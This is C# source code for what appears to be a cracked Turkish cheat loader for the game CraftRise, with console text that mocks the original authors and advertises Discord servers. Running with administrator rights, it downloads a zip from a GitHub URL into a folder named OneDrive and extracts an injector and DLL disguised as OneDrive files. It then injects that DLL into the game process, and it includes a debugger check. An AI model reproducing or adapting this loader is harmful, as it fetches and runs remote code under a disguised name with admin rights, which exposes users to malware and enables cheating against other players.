using System; using System.Diagnostics; using System.IO; using System.IO.Compression; using System.Net; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Security.Principal; using System.Threading; namespace AntiDebugging { internal class Loader { public static void Main() { if (!Loader.IsRunAsAdministrator()) { Console.ForegroundColor = ConsoleColor.Yellow; Console.WriteLine("[-] Programı yönetici olarak çalıştırmadınız. Programı yönetici olarak açmanız önerilir."); Thread.Sleep(1000); Environment.Exit(0); return; } Directory.CreateDirectory(Loader.downloadFolder); Loader.DownloadAndExtractZip(); Loader.ShowMenu(); } private static bool IsDebuggerPresent() { bool result = false; Loader.CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref result); return result; } [DllImport("kernel32.dll", SetLastError = true)] [return: MarshalAs(2)] private static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); private static void ShowMenu() { for (; ; ) { Console.Title = "Faith Shit Client Get F*cked By Overdose & alperenxrq"; Console.WriteLine("[+] deobfuscated by overdose & alperen."); Console.Clear(); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine("bu tarz sikimsonik clientlere para vermeyin biz size kırarız (:"); Console.WriteLine("cracked by: alperenxrq, overdose"); Console.WriteLine("alperenxrq: discord.gg/wentra"); Console.WriteLine("overdose: discord.gg/C7ewJ9ESdH"); Console.ForegroundColor = ConsoleColor.DarkBlue; Console.WriteLine("\r\n$$$$$$$$\\ $$$$$$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$\\ $$$$$$$\\ $$$$$$$$\\ $$$$$$$\\ \r\n$$ _____|$$ __$$\\ \\_$$ _|\\__$$ __|$$ | $$ | $$ | $$ __$$\\ $$ __$$\\ $$ __$$\\ $$ _____|$$ __$$\\ \r\n$$ | $$ / $$ | $$ | $$ | $$ | $$ | $$ | $$ / $$ |$$ / $$ |$$ | $$ |$$ | $$ | $$ |\r\n$$$$$\\ $$$$$$$$ | $$ | $$ | $$$$$$$$ | $$ | $$ | $$ |$$$$$$$$ |$$ | $$ |$$$$$\\ $$$$$$$ |\r\n$$ __| $$ __$$ | $$ | $$ | $$ __$$ | $$ | $$ | $$ |$$ __$$ |$$ | $$ |$$ __| $$ __$$< \r\n$$ | $$ | $$ | $$ | $$ | $$ | $$ | $$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |\r\n$$ | $$ | $$ |$$$$$$\\ $$ | $$ | $$ | $$$$$$$$\\ $$$$$$ |$$ | $$ |$$$$$$$ |$$$$$$$$\\ $$ | $$ |\r\n\\__| \\__| \\__|\\______| \\__| \\__| \\__| \\________|\\______/ \\__| \\__|\\_______/ \\________|\\__| \\__|\r\nRELEASE [1.5] BY tuytqr,swezy_4584,darkinmoon\r\n ________________________________________________________________________________________________________________\r\n "); Console.ResetColor(); Console.ForegroundColor = ConsoleColor.Yellow; Console.Write("Hile Nasıl Açılır 2 Tuşuna Basarak Acınız Eğer Crash Yada İnjectlemiyorsa Yoneticilere Bildirin."); Console.ResetColor(); Console.ForegroundColor = ConsoleColor.Red; Console.Write("\nLütfen bir komut girin [1]güncelle, [2]Hile, [3]çıkış, [4]Spoofer[SOON]): "); string a = Console.ReadLine(); if (a == "1") { Console.WriteLine("[+] Program zaten güncel."); } else { if (a == "2") { Console.WriteLine("[+] Enjeksiyon yapılıyor..."); Console.Title = "Faith Shit Client Get F*cked By Overdose & alperenxrq"; Console.WriteLine("[+] deobfuscated by overdose & alperen."); Console.ResetColor(); string str = "C:\\ProgramData\\OneDrive\\onedrive.dll"; string fileName = "C:\\ProgramData\\OneDrive\\onedrive.exe"; ProcessStartInfo processStartInfo = new ProcessStartInfo(); processStartInfo.FileName = fileName; processStartInfo.Arguments = "-n craftrise-x64.exe -i " + str; try { using (Process process = Process.Start(processStartInfo)) { process.WaitForExit(); Console.WriteLine("[+] Enjeksiyon tamamlandı."); Console.Clear(); } continue; } catch (Exception ex) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("[-] Hata: " + ex.Message); Console.ResetColor(); continue; } } if (a == "3") { goto Block_4; } Console.WriteLine("[-] Geçersiz komut!"); } } return; Block_4: Console.WriteLine("[+] Programdan çıkılıyor..."); } private static void DownloadAndExtractZip() { try { if (File.Exists(Loader.zipFilePath)) { Console.WriteLine("[+] Dosya zaten mevcut."); } else { using (WebClient webClient = new WebClient()) { Console.WriteLine("[+] Dosya indiriliyor..."); webClient.DownloadFile(Loader.zipUrl, Loader.zipFilePath); Console.WriteLine("[+] Dosya indirildi."); } } Console.WriteLine("[+] Dosya çıkartılıyor..."); using (ZipArchive zipArchive = ZipFile.OpenRead(Loader.zipFilePath)) { foreach (ZipArchiveEntry zipArchiveEntry in zipArchive.Entries) { string destinationFileName = Path.Combine(Loader.downloadFolder, zipArchiveEntry.FullName); zipArchiveEntry.ExtractToFile(destinationFileName, true); } } Console.WriteLine("[+] Dosya başarıyla çıkartıldı."); } catch (Exception) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("[-] Hata: Upload 1337"); Console.ResetColor(); } } private static bool IsRunAsAdministrator() { return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator); } private static string zipUrl = "https://github.com/uwutpy/faith-get-d0sed/raw/main/onedrivers.zip"; private static string downloadFolder = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "OneDrive"); private static string zipFilePath = Path.Combine(Loader.downloadFolder, "onedrivers.zip"); } }